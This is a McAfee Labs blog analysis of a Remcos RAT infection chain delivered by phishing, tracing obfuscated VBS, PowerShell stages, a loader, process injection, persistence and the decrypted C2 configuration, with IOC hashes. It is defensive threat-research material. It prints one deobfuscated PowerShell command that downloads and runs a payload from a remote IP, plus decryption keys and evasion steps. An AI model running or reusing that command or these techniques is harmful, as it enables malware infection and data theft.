Peeling Back the Layers of RemcosRat Malware | McAfee Blog

Authored by Preksha Saxena

McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email contained a ZIP/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file. 

Remcos is a sophisticated RAT which provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos incorporates different obfuscation and anti-debugging techniques to evade detection. It regularly updates its features and makes this malware a challenging adversary. 

Execution Flow: 

  

Figure 1: Execution Flow 

Stage 1: Analysis of VBS file 

VBS file is downloaded from a RAR file which is named as “August 2023 Statement of Account.z” This VBS file used various techniques to make analysis very difficult; including lots of commented code, and random strings that mask the true execution chain from being quickly visible. The actual data for execution is obfuscated too. 

Investigating this VBS script started with dealing with the large comment blocks as shown in figure below. 

Figure 2:VBS Script 

 One obfuscated string references a URL. The script contains a replace function to deobfuscate the proper command line. 

Another part of VBS script is the execute function shown in below image, which merely decodes a fake message. 

“omg!it’s_so_long_:-)you_found_the_secret_message_congrats!!” 

Figure 3:Deobfuscating PowerShell command using replace function. 

 The purpose of this VBS script is to download a payload using PowerShell. To increase the size, and make the script obfuscated, comments were added. The PowerShell command deobfuscates to: 

“powershell -w 1 -exeC Bypass -c “”[scriptblock]::Create ((Invoke-WebRequest ‘http://212.192.219.52/87656.txt’ -UseBasicParsing).Content).Invoke();””” 

Stage 2: Analysis of PowerShell script (87656.txt)  

The downloaded file, 87656.txt, is an obfuscated PowerShell script. 

Figure 4:Obfuscated PowerShell Script 

 The deobfuscation logic first searches for any variable containing “mdR”; in this case the result is ‘MaximumDriveCount’. From this string, characters at positions [3,11,2] are selected, resulting in the string “iex”. Here malware obfuscates iex(Invoke-Expression) command to evade itself from static detection. 

Figure 5:Resolving IEX 

Then, PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm. 

Decompressed data is again a PowerShell script which is analyzed below. 

Stage 3: Analysis of decompressed PowerShell script  

The decompressed PowerShell script is large and obfuscated: 

Figure 6: Decompressed PowerShell script 

The first part of the script has the same logic present in the first PowerShell file. It is again decoding invoke-expression “ieX” by using the psHome variable. 

Figure 7:Deobfuscating PowerShell script 

The second part of the PowerShell script contains a base64 encoded PE file, which will be analyzed in a later stage. 

Figure 8: Base64 encoded data. 

The third part of PowerShell script is used to inject the decoded PE file in a newly created process. After deobfuscation, the code below is used for code injection. “Wintask.exe” is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process. 

 Figure 9: Code used for PE injection. 

Windows Defender exclusions are added. 

Figure 10: Exclusion code 

Stage 4: Analysis of decoded PE File  

The 1.1MB PE file is a .NET binary, using an MSIL loader. 

Figure 11: MSIL Loader 

The Main function calls the Units function, which calls a random function. 

Figure 12:Main function 

The random function contains a large amount of encrypted data, stored in a text variable. 

Figure 13: Encrypted data 

The ‘text’ data is first converted from string to hex array then reversed and stored in variable ‘array’. The decryption key is hardcoded and stored in variable ‘array4’. The key is “0xD7” (215 in decimal). 

Figure 14: code for converting data to uppercase. 

The decryption loop issues the RC4 algorithm. The data decrypts a PE file, which is a DLL (Dynamic Link Library), loaded and executed using the ‘NewLateBinding.LateGet()’ method, passing the payload file (dGXsvRf.dll) as an argument as shown below. 

To execute the decrypted DLL in memory, the malware uses reflecting code loading. In this process, malware injects and executes the decrypted code in the same process. For this, the malware uses the load parameter in the ‘NewLateBinding.LateGet()’ function. 

Figure 15: RC4 algorithm 

Figure 16: New instance created for decrypted dll 

Stage 5: Analysis of dGXsvRf.dll 

Decrypted DLL ‘dGXsvRf.dll is the SykCrypter Trojan, using a resource named “SYKSBIKO” containing an encrypted payload. 

Figure 17: Encrypted payload 

SykCrypter decrypts the final payload and decrypts many strings related to identifying the presence of AV software, persistence, and anti-debugging techniques. The SykCrypter encrypted data is very large and is decrypted using a simple XOR operation with 170 as the key and current index.  


Figure 18: SykCryptor Encrypted data 

Each string is decrypted and accessed using a predefined function which hardcodes its length and offset in a large byte array. The final payload is stored in a resource and is decrypted using the RC4 algorithm with the key “uQExKBCIDisposablev”. 

Figure 19: RC4 Algorithm 

Another .NET dll with size 0x1200 and the method name, “Zlas1” is used for deflation. 

Figure 20: Loading DLL for deflation. 

The DLL then decrypts a list of various security solution process names: 

Figure 21:Code for decrypting Security processes Names 

The decrypted list of process names include: 

vsserv bdservicehost odscanui bdagent  

bullgaurd BgScan BullGuardBhvScanner etc. 

The malware also drops acopy of itself in the %appdata% folder using cmd. 

Figure 22: Copying file. 

Persistence: 

To persist system reboots, the malware creates a shortcut file in the Documents folder with a.pif extension, and creates a registry Run key entry. 

Figure 23: Persistence Mechanism 

Process Injection: 

The SykCrypter Dll decrypts and loads a .NET file and calls its “GetDelegateForFunctionPointer” function, creating delegation to all APIs from kernel32 and NTDll.dll in the same method. It loads GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, NtUnmapViewOfSection and so on. 

Then, finally it loads “WriteProcessMemory,” API which injects the decrypted payload into a process and calls ResumeThread. 

Figure 24: Process Injection 

Stage 6: Analysis of final payload 

The final payload is a Microsoft Visual C++ 8 executable with size of 477 KB. Strings directly visible in file are: 

Figure 25: Strings in payload 

The configuration file of Remcos is present in RCData “SETTINGS“, which is encrypted with the RC4 algorithm. In the given sample, the key size is 76 byte long. 

Figure 26: RC4 encrypted configuration file 

Decrypted Configuration: 

 Figure 27: Decrypted configuration 

The Remcos configuration has C2 information (172.96.14.18), its port number (2404), mutex created by malware (Rmc-OB0RTV) and other configuration details. It has the capability to harvest information from various applications, such as browsers, email clients, cryptocurrency wallets etc. It also enables remote access for an attacker and can act as a dropper for other malware. 

Conclusion: 

RemcosRat is a complex multi-stage threat. McAfee Labs unpacked the how this malware downloads and executes VBS and PowerShell scripts; how the threat unwraps different layers and downloads the final Remcos remote access payload. At McAfee, we are committed to providing our customers with robust and effective threat defense that detects and protects against threats like RemcosRat and many other families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats to keep you safe. 

Indicators of Compromise (IOCs):  

SHA256  Filetype 
0b3d65305edc50d3882973e47e9fbf4abc1f04eaecb13021f434eba8adf80b67  VBS 
3ed5729dc3f12a479885e434e0bdb7722f8dd0c0b8b27287111564303b98036c  PowerShell 
1035dbc121b350176c06f72311379b230aaf791b01c7091b45e4c902e9aba3f4  MSIL loader 
32c8993532bc4e1f16e86c70c0fac5d51439556b8dcc6df647a2288bc70b8abf  SykCrypter 
61c72e0dd15ea3de383e908fdb25c6064a5fa84842d4dbf7dc49b9a01be30517  Remcos Payload 

Introducing McAfee+

Identity theft protection and privacy for your digital life

Source: Original Post


“An interesting youtube video that may be related to the article above”